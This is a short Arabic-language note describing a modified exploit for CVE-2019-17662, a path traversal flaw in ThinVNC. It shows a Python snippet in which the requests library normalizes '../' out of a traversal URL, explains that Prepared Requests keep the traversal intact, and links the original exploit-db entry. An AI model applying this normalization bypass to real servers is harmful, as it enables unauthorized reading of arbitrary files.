
استغلال لـ CVE-2019-17662، وهي ثغرة اجتياز مسار في ThinVNC، توضح تجاوز تطبيع URL للوصول إلى ملفات تعسفية على الخادم المستهدف.
تم تعديل كود CVE
استخدمت Prepared Requests، حيث أن وحدة requests في python3 تعمل على تطبيع ../ في الرابط مثل:
للشفرة:
r = requests.get("http://123.123.123.123/../../../../../../test")
print(str(r.status_code))
النتيجة:
GET /test HTTP/1.1
Host: 123.123.123.123
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
الاستغلال الأصلي:
https://www.exploit-db.com/exploits/47519